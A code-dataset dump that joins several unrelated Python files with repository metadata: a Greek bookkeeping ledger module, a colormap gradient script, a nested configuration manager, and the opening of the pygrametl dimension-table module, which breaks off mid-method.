return ul.dec2gr(self.pis)
@property
def hierarchy(self):
assert len(self.lmo) > 1
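        # Builds every roll-up key for this account code, from the global
        # total bucket down to the full code; illustrative example:
        # '38.00.000' -> ['t', 't35', '3', '38', '38.00', '38.00.000'].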
listlmo = self.lmo.split(SPLIT_CHAR)
listfinal = ['t']
if self.lmo[0] in '267':
listfinal.append('t267')
elif self.lmo[0] in '35':
listfinal.append('t35')
listfinal.append(self.lmo[0])
tmp = ''
for el in listlmo:
if tmp == '':
tmp = el
else:
tmp = SPLIT_CHAR.join([tmp, el])
listfinal.append(tmp)
return listfinal
def __str__(self):
return FORMAT_LINE % (self.lmo, self.gxre, self.gpis)
class Arthro():
def __init__(self, dat, par, per, lines=None):
self.dat = dat
self.par = par
self.per = per
if lines:
self.z = lines
else:
self.z = []
def similarities(self):
'''Find similarities between accounts'''
print(', '.join([lm.lmo for lm in self.z]))
@property
def typos(self):
tset = set()
for line in self.z:
tset = tset.union(line.typos)
# if {'ΦΠΑ', 'ΑΓΟΡΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΜΕ ΦΠΑ')
# if {'ΑΓΟΡΕΣ', 'ΠΡΟΜΗΘΕΥΤΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΕΠΙ ΠΙΣΤΩΣΕΙ')
return tset
@property
def ee_typos(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return '7'
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return '26'
elif '1' in self.typos:
return '1'
else:
return 'ΛΑΘΟΣ'
@property
def ee_synt(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return ul.dec(-1)
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return ul.dec(1)
elif '1' in self.typos:
return ul.dec(1)
else:
return ul.dec(0)
def is_typos(self, typos):
return typos in self.typos
@property
def lmoi(self):
'''List with arthro lmoi'''
return [line.lmo for line in self.z]
@property
def zlines(self):
'''Number of lines'''
return len(self.z)
def add(self, line):
self.z.append(line)
@property
def val(self):
return sum([line.xre for line in self.z])
@property
def is_complete(self):
total = sum([line.y for line in self.z])
abstotal = sum([abs(line.y) for line in self.z])
return total == 0 and abstotal > 0
def __str__(self):
ast = '%s %s %s\n' % (self.dat, self.par, self.per)
txr = tpi = ul.dec(0)
for line in self.z:
ast += ' %s\n' % line
txr += line.xre
tpi += line.pis
ast += ' ' + FORMAT_LINE % ('Σύνολο', txr, tpi)
return ast
class Book():
def __init__(self, lmoi=None, arthra=None):
# self.lmoi = lmoi
        self.lmoi = {**(lmoi or {}), **LM1}
        self.arthra = arthra if arthra is not None else []
def add_arthro(self, arthro):
self.arthra.append(arthro)
for lmo in arthro.lmoi:
if lmo not in self.lmoi:
self.lmoi[lmo] = {}
@property
def typoi(self):
typoi = set()
for arthro in self.arthra:
typoi = typoi.union(arthro.typos)
return typoi
def isozygio(self, apo, eos, typos=None):
isoz = {}
for arthro in self.arthra:
if not apo <= arthro.dat <= eos:
continue
if typos and not arthro.is_typos(typos):
continue
for line in arthro.z:
for lmo in line.hierarchy:
isoz[lmo] = isoz.get(lmo, ul.dec(0)) + line.y
return isoz
def isozygio_print(self, apo, eos, typos=None):
isoz = self.isozygio(apo, eos, typos)
tst = '%-20s %-50s %12s'
print('Ισοζύγιο από %s έως %s %s' % (apo, eos, typos or 'ΟΛΑ'))
for lmo in sorted(isoz):
print(tst % (lmo, self.lmoi.get(lmo, lmo), isoz[lmo]))
def kartella(self, lmos, apo, eos):
fdata = []
total = ul.dec(0)
before = ul.dec(0)
after = ul.dec(0)
for arthro in self.arthra:
for line in arthro.z:
if lmos in line.hierarchy:
if arthro.dat < apo:
before += line.y
elif arthro.dat > eos:
after += line.y
else:
total += line.y
fdata.append((arthro.dat, arthro.par, arthro.per,
line.xre, line.pis, total))
return fdata, before, after
def kartella_print(self, lmos, apo, eos):
data, before, after = self.kartella(lmos, apo, eos)
ast = 'Καρτέλλα Λογαριασμού %s %s (Άπό: %s Έως: %s)'
print(ast % (lmos, self.lmoi[lmos], apo, eos))
print('%-139s %12s' % ('Υπόλοιπο από μεταφορά', before))
for dat in data:
# print(len(dat[2]))
print('%-10s %-26s %-75s %12s %12s %12s' % dat)
def fpa(self, apo, eos):
'''
        1. Select the entries (arthra) that include VAT.
        2. Check whether there is more than one line with VAT.
        In the simple case of a single VAT line and a single 1/2/6/7 line,
        the rate is found by dividing the 54.00 (VAT) amount by that line's
        amount; the rate should be one of the known rates (13, 24), and the
        account is then added to the category it belongs to.
'''
pass
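        # A rough sketch of the approach described above (an assumption, not
        # the author's implementation):
        # for arthro in self.arthra:
        #     if not (apo <= arthro.dat <= eos) or '54.00' not in arthro.typos:
        #         continue
        #     fpa = sum(line.y for line in arthro.z if '54.00' in line.typos)
        #     base = sum(line.y for line in arthro.z if line.lmo[0] in '1267')
        #     if base:
        #         rate = round(100 * fpa / base)  # expected to be ~13 or ~24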
def arthra_print(self, typos=None):
headt = "%-6s %-10s %s %s %s"
lit = " %-12s %-40s %12s %12s"
i = 0
for art in self.arthra:
if typos and typos not in art.typos:
continue
i += 1
print(headt % (i, art.dat, art.par, art.per, art.typos))
for lin in art.z:
print(lit % (lin.lmo, self.lmoi.get(lin.lmo, lin.lmo),
lin.xre, lin.pis))
print('')
def eebook(self):
i = 0
lins = []
for art in self.arthra:
if 'ΕΕ' not in art.typos:
continue
i += 1
poso = ul.dec(0)
fpa = ul.dec(0)
lmo = ''
for line in art.z:
if '54.00' in line.typos:
fpa += ul.dec(line.y * art.ee_synt)
elif '1' in line.typos:
poso += ul.dec(line.xre * art.ee_synt)
elif '2' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '6' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '7' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '3-5' in line.typos:
lmo = line.lmo
else:
pass
lins.append({'aa': i, 'date': art.dat, 'typ': art.ee_typos,
'par': art.par, 'per': art.per, 'poso': poso,
'fpa': fpa, 'tot': art.val, 'lmo': lmo})
return lins
def eebook_print(self, eefile):
afms = pafm.parsefile(eefile)
a5398, _ = parse_afm_5398()
l5398 = []
eedata = self.eebook()
stc = ('{aa:<5}{date} {typ:2} {lmo:12} {par:22} {afm:9} {per:30} {es:12}'
'{esf:12} {est:12} {ej:12} {ejf:12} {ejt:12}')
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
for line in eedata:
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
print(stc.format(**line))
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
print('Esoda : %s Ejoda : %s paroxi: %s' % (te, tj, total_paroxi))
def eebook_myf(self, eefile):
afms = pafm.parsefile(eefile)
a5398, pfpa5398 = parse_afm_5398()
l5398 = []
eedata = self.eebook()
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
lines = []
for line in eedata:
line['mdate'] = date2period(line['date'])
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
if line['afm'] == '1':
line['myft'] = '3cash'
elif line['afm']:
line['myft'] = '1rev'
else:
line['myft'] = ' rev '
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
if line['afm'].strip():
line['myft'] = '2exp'
elif line['lmo'].startswith('53.98.'):
line['myft'] = '4oexp'
else:
line['myft'] = 'exp'
if line['fpa'] != 0:
print('Error', line)
if line['poso'] < 0:
line['decr'] = 'credit'
line['mposo'] = -1 * line['poso']
line['mfpa'] = -1 * line['fpa']
else:
line['decr'] = 'normal'
line['mposo'] = line['poso']
line['mfpa'] = line['fpa']
if line['mfpa'] == 0 and line['lmo'] in pfpa5398:
poso = ul.dec(line['mposo'] / (1 + pfpa5398[line['lmo']]))
fpa = line['mposo'] - poso
line['mposo'] = poso
line['mfpa'] = fpa
lines.append(line)
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
return lines
def myf(self, lines):
pass
def eebook_totals(self, apo, eos):
eedata = self.eebook()
eposo = efpa = xposo = xfpa = ul.dec(0)
for line in eedata:
if not (apo <= line['date'] <= eos):
continue
if line['typ'] == '7':
eposo += line['poso']
efpa += line['fpa']
elif line['typ'] in ('26', '1'):
xposo += line['poso']
xfpa += line['fpa']
else:
print('Error')
print('Σύνολα για περίοδο από %s έως %s' % (apo, eos))
print('Έσοδα : %15s ΦΠΑ: %15s' % (eposo, efpa))
print('Έξοδα : %15s ΦΠΑ: %15s' % (xposo, xfpa))
print('Διαφορά: %15s %15s' % (eposo - xposo, efpa - xfpa))
def __str__(self):
stf = ''
for arthro in self.arthra:
stf += '%s\n' % arthro.__str__()
return stf
|
gpl-3.0
| -1,884,717,183,715,299,000
| 31.927451
| 84
| 0.450009
| false
| 2.680019
| false
| false
| false
|
leobrowning92/generative-art
|
colormap.py
|
1
|
3108
|
import os
import cairo as cairo
import numpy as np
from render import Animate, Image_Creator
import matplotlib.cm as cm
def random_rgb_color(alpha=1):
return [np.random.uniform(0,1),np.random.uniform(0,1), np.random.uniform(0,1),alpha]
def linear_gradient(start,finish,n=10,alpha=1):
gradient=[0]*n
gradient[0]=start
for i in range(1,n):
gradient[i]=[start[j]+i*(finish[j]-start[j])/float(n) for j in range(3)]+[alpha]
return gradient
def polylinear_gradient(colors,spacing,total_steps,alpha=1):
"""colors is a list of rgb colors, with spacing being the
relative positions of the colors along the gradientself.
spacings are thus sequential numbers between 0 and 1
where the first and last items must be 0 and 1 respectively"""
assert len(colors)==len(spacing), "every color must have a corresponding spacing"
assert total_steps>=2*len(colors) #soft cap on num of colors wrt n
gradient=[]
for i in range(len(colors)-1):
gradient= gradient + linear_gradient(colors[i], colors[i+1], spacing[i+1] -spacing[i],alpha=alpha )
assert len(gradient)==total_steps
return gradient
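# A minimal, hypothetical sketch of how polylinear_gradient is meant to be
# called (the colors and step counts below are invented for illustration):
#
#   red, blue = [1, 0, 0], [0, 0, 1]
#   # ten colors fading from red to blue; spacing is given in gradient steps,
#   # starting at 0 and ending at total_steps
#   ramp = polylinear_gradient([red, blue], [0, 10], 10)
#   assert len(ramp) == 10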
def hex_to_rgb(hex):
    # parse '#rrggbb' into [r, g, b]; the components are hexadecimal, so base 16
    return [int(hex[i:i+2], 16) for i in range(1, 6, 2)]
def random_colormap(number_of_colors,total_steps, even=True,v=True,alpha=1):
colors=[]
spacing=[0]
for i in range(number_of_colors):
colors.append(random_rgb_color(alpha=alpha))
if even:
spacing=np.linspace(0,total_steps,num=number_of_colors,dtype=int)
else:
        for i in range(number_of_colors-2):
            # intermediate positions are random gradient steps; the original 0-1
            # floats broke polylinear_gradient, which expects step positions
            spacing.append(int(np.random.uniform(0.01, 0.99) * total_steps))
        spacing.append(total_steps)
if v:
print("colors:")
for i in colors:
print(*i)
print("spacing:\n", *sorted(spacing))
return polylinear_gradient(colors,sorted(spacing),total_steps,alpha=alpha)
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# These are the required arguments for the Animation
background_color = [1, 1, 1, 1]
image_size = [200,200]
unit=1.0/max(image_size)
total_steps=max(image_size)
#foreground_colors=linear_gradient([.5,0,.5],[1,1,0],n=image_size)
#foreground_colors=random_colormap(3,total_steps,even=False)
colors=np.genfromtxt(fname='sourceimages/IMG_9308_kmean6.dat',skip_header=1,delimiter=',')
foreground_colors=polylinear_gradient(colors,np.linspace(0,total_steps,num=len(colors),dtype=int) ,total_steps)
def step_function(self):
# render.clear_canvas()
self.line([self.steps*unit,0],[self.steps*unit,1],width=unit)
return True
show=True
if show:
# These are the bits that need to be run when calling the Animation
render = Animate(image_size, background_color, foreground_colors, step_function, interval=100, save=False, stop=total_steps)
render.start()
else:
#this is what needs to be run to produce an image without animation
image=Image_Creator(image_size, background_color, foreground_colors, step_function, stop=total_steps)
image.create()
|
gpl-3.0
| 146,574,262,081,108,060
| 34.318182
| 132
| 0.67278
| false
| 3.363636
| false
| false
| false
|
buxx/synergine
|
synergine/core/config/ConfigurationManager.py
|
1
|
2347
|
from synergine.core.exception.NotFoundError import NotFoundError
class ConfigurationManager():
"""
Management of dict based configuration data
"""
def __init__(self, config: dict={}):
self._configs = config
def get(self, config_name: "the.config.name", default=None):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif default is not None:
return default
else:
                raise NotFoundError('Config "' + config_name + '" not found')
return config
def update_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
inception_count = 0
parent_config = self._configs
config = self._configs
for inception in inceptions:
inception_count += 1
if inception in config:
parent_config = config
config = config[inception]
else:
                raise Exception('Config "' + config_name + '" not found')
parent_config[inception] = config_value
def set_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif inceptions.index(inception)+1 == len(inceptions):
config[inception] = config_value
else:
config[inception] = {inceptions.__getitem__(inceptions.index(inception)+1): {}}
config = config[inception]
def load(self, config_to_load):
self._configs = self._merge(self._configs, config_to_load)
def _merge(self, a, b, path=None):
"merges b into a"
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
self._merge(a[key], b[key], path + [str(key)])
elif a[key] == b[key]:
pass
else:
a[key] = b[key]
else:
a[key] = b[key]
return a
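# A small, hypothetical usage sketch of ConfigurationManager; the keys and
# values below are invented for illustration:
#
#   config = ConfigurationManager({'db': {'host': 'localhost'}})
#   config.get('db.host') # -> 'localhost'
#   config.get('db.port', default=5432) # -> 5432, the fallback value
#   config.set_config('db.port', 5433) # creates the nested key if needed
#   config.load({'db': {'user': 'synergine'}}) # merged into the existing config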
|
apache-2.0
| -4,210,175,498,560,973,300
| 34.044776
| 95
| 0.536003
| false
| 4.267273
| true
| false
| false
|
jpercent/pygrametl
|
pygrametl/tables.py
|
1
|
122529
|
"""This module contains classes for looking up rows, inserting rows
and updating rows in dimensions and fact tables. Rows are represented
as dictionaries mapping between attribute names and attribute values.
Many of the class methods take an optional 'namemapping' argument which is
explained here, but not repeated in the documentation for the individual
methods: Consider a method m which is given a row r and a namemapping n.
Assume that the method m uses the attribute a in r (i.e., r[a]). If the
attribute a is not in the namemapping, m will just use r[a] as expected.
But if the attribute a is in the namemapping, the name a is mapped to
another name and the other name is used. That means that m then uses
r[n[a]]. This is practical if attribute names in the considered rows and
DW tables differ. If, for example, data is inserted into an order dimension
in the DW that has the attribute order_date, but the source data uses the
attribute name date, we can use a name mapping from order_date to date:
dim.insert(row=..., namemapping={'order_date':'date'})
"""
# Copyright (c) 2009-2015, Aalborg University (chr@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import locale
from subprocess import Popen, PIPE
from sys import version_info
import tempfile
from time import sleep
import types
import pygrametl
from pygrametl.FIFODict import FIFODict
import pygrametl.parallel
try:
from functools import reduce
except ImportError:
# Jython 2.5.X specific code
pass
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.4.0a'
__all__ = ['Dimension', 'CachedDimension', 'BulkDimension',
'CachedBulkDimension', 'TypeOneSlowlyChangingDimension',
'SlowlyChangingDimension', 'SnowflakedDimension', 'FactTable',
'BatchFactTable', 'BulkFactTable', 'SubprocessFactTable',
'DecoupledDimension', 'DecoupledFactTable', 'BasePartitioner',
'DimensionPartitioner', 'FactTablePartitioner']
class Dimension(object):
"""A class for accessing a dimension. Does no caching."""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
          a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if not type(key) in pygrametl._stringtypes:
raise ValueError("Key argument must be a string")
if not len(attributes):
raise ValueError("No attributes given")
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
if targetconnection is None:
raise ValueError("No target connection available")
self.targetconnection = targetconnection
self.name = name
self.attributes = attributes
self.key = key
self.all = [key, ]
self.all.extend(attributes)
if lookupatts == ():
lookupatts = attributes
elif not len(lookupatts):
raise ValueError("Lookupatts contain no attributes")
elif not set(lookupatts) <= set(self.all):
raise ValueError("Lookupatts is not a subset of attributes")
self.lookupatts = lookupatts
self.defaultidvalue = defaultidvalue
self.rowexpander = rowexpander
pygrametl._alltables.append(self)
# Now create the SQL that we will need...
# This gives "SELECT key FROM name WHERE lookupval1 = %(lookupval1)s
# AND lookupval2 = %(lookupval2)s AND ..."
self.keylookupsql = "SELECT " + key + " FROM " + name + " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (lv, lv) for lv in lookupatts])
# This gives "SELECT key, att1, att2, ... FROM NAME WHERE key =
# %(key)s"
self.rowlookupsql = "SELECT " + ", ".join(self.all) + \
" FROM %s WHERE %s = %%(%s)s" % (name, key, key)
# This gives "INSERT INTO name(key, att1, att2, ...)
# VALUES (%(key)s, %(att1)s, %(att2)s, ...)"
self.insertsql = "INSERT INTO " + name + "(%s" % (key,) + \
(attributes and ", " or "") + \
", ".join(attributes) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
if idfinder is not None:
self.idfinder = idfinder
else:
self.targetconnection.execute("SELECT MAX(%s) FROM %s" %
(key, name))
self.__maxid = self.targetconnection.fetchonetuple()[0]
if self.__maxid is None:
self.__maxid = 0
self.idfinder = self._getnextid
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_lookup(row, namemapping)
if key is not None:
return key
self.targetconnection.execute(self.keylookupsql, row, namemapping)
keyvalue = self.targetconnection.fetchonetuple()[0]
if keyvalue is None:
keyvalue = self.defaultidvalue # most likely also None...
self._after_lookup(row, namemapping, keyvalue)
return keyvalue
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
self.targetconnection.execute(self.rowlookupsql, {self.key: keyvalue})
row = self.targetconnection.fetchone(self.all)
self._after_getbykey(keyvalue, row)
return row
def _before_getbykey(self, keyvalue):
return None
def _after_getbykey(self, keyvalue, resultrow):
pass
def getbyvals(self, values, namemapping={}):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
# select all attributes from the table. The attributes available from
# the values dict are used in the WHERE clause.
attstouse = [a for a in self.attributes
if a in values or a in namemapping]
sql = "SELECT " + ", ".join(self.all) + " FROM " + self.name + \
" WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(sql, values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.all)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping):
return None
def _after_getbyvals(self, values, namemapping, resultrows):
pass
def update(self, row, namemapping={}):
"""Update a single row in the dimension table.
Arguments:
- row: a dict which must contain the key for the dimension.
The row with this key value is updated such that it takes
the value of row[att] for each attribute att which is also in
row.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res:
return
if self.key not in row:
raise KeyError("The key value (%s) is missing in the row" %
(self.key,))
attstouse = [a for a in self.attributes
if a in row or a in namemapping]
if not attstouse:
# Only the key was there - there are no attributes to update
return
sql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % (att, att) for att in attstouse]) + \
" WHERE %s = %%(%s)s" % (self.key, self.key)
self.targetconnection.execute(sql, row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given row. If that fails, insert it. Return the key value.
If the lookup fails and a rowexpander was set when creating the
instance, this rowexpander is called before the insert takes place.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if res is not None and res != self.defaultidvalue:
return res
else:
if self.rowexpander:
row = self.rowexpander(row, namemapping)
return self.insert(row, namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def _getnextid(self, ignoredrow, ignoredmapping):
self.__maxid += 1
return self.__maxid
def endload(self):
"""Finalize the load."""
pass
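# A minimal, hypothetical sketch of how Dimension and the namemapping argument
# described in the module docstring are typically used. The table, attribute,
# and connection names are invented; a ConnectionWrapper around a PEP 249
# connection is assumed to have been created first:
#
#   import pygrametl
#   from pygrametl.tables import Dimension
#
#   conn = pygrametl.ConnectionWrapper(connection=some_dbapi_connection)
#   productdim = Dimension(name='product', key='productid',
#                          attributes=['name', 'category', 'price'],
#                          lookupatts=['name'])
#   # the source rows use 'productname' instead of 'name':
#   row = {'productname': 'Widget', 'category': 'tools', 'price': 9.95}
#   keyval = productdim.ensure(row, namemapping={'name': 'productname'})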
class CachedDimension(Dimension):
"""A class for accessing a dimension. Does caching.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
size=10000, prefill=False, cachefullrows=False,
cacheoninsert=True, usefetchfirst=False,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
          a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- size: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- cacheoninsert: a flag deciding if the cache should be updated
when insertions are done. Default: True
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
          clause is used when prefill is True. Depending on the used DBMS
          and DB driver, this can give significant savings wrt. time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
targetconnection=targetconnection)
self.cacheoninsert = cacheoninsert
self.__prefill = prefill
self.__size = size
if size > 0:
if cachefullrows:
self.__key2row = FIFODict(size)
self.__vals2key = FIFODict(size)
else:
# Use dictionaries as unlimited caches
if cachefullrows:
self.__key2row = {}
self.__vals2key = {}
self.cachefullrows = cachefullrows
if prefill:
if cachefullrows:
positions = tuple([self.all.index(att)
for att in self.lookupatts])
# select the key and all attributes
sql = "SELECT %s FROM %s" % (", ".join(self.all), name)
else:
# select the key and the lookup attributes
sql = "SELECT %s FROM %s" % \
(", ".join([key] + [l for l in self.lookupatts]), name)
positions = range(1, len(self.lookupatts) + 1)
if size > 0 and usefetchfirst:
sql += " FETCH FIRST %d ROWS ONLY" % size
self.targetconnection.execute(sql)
if size <= 0:
data = self.targetconnection.fetchalltuples()
else:
data = self.targetconnection.fetchmanytuples(size)
for rawrow in data:
if cachefullrows:
self.__key2row[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.__vals2key[t] = rawrow[0]
def lookup(self, row, namemapping={}):
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached. We don't have to look in the DB
res = self._before_lookup(row, namemapping)
if res is not None:
return res
else:
return self.defaultidvalue
else:
# Something is not cached so we have to use the classical lookup.
# (We may still benefit from the cache due to a call of
# _before_lookup)
return Dimension.lookup(self, row, namemapping)
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
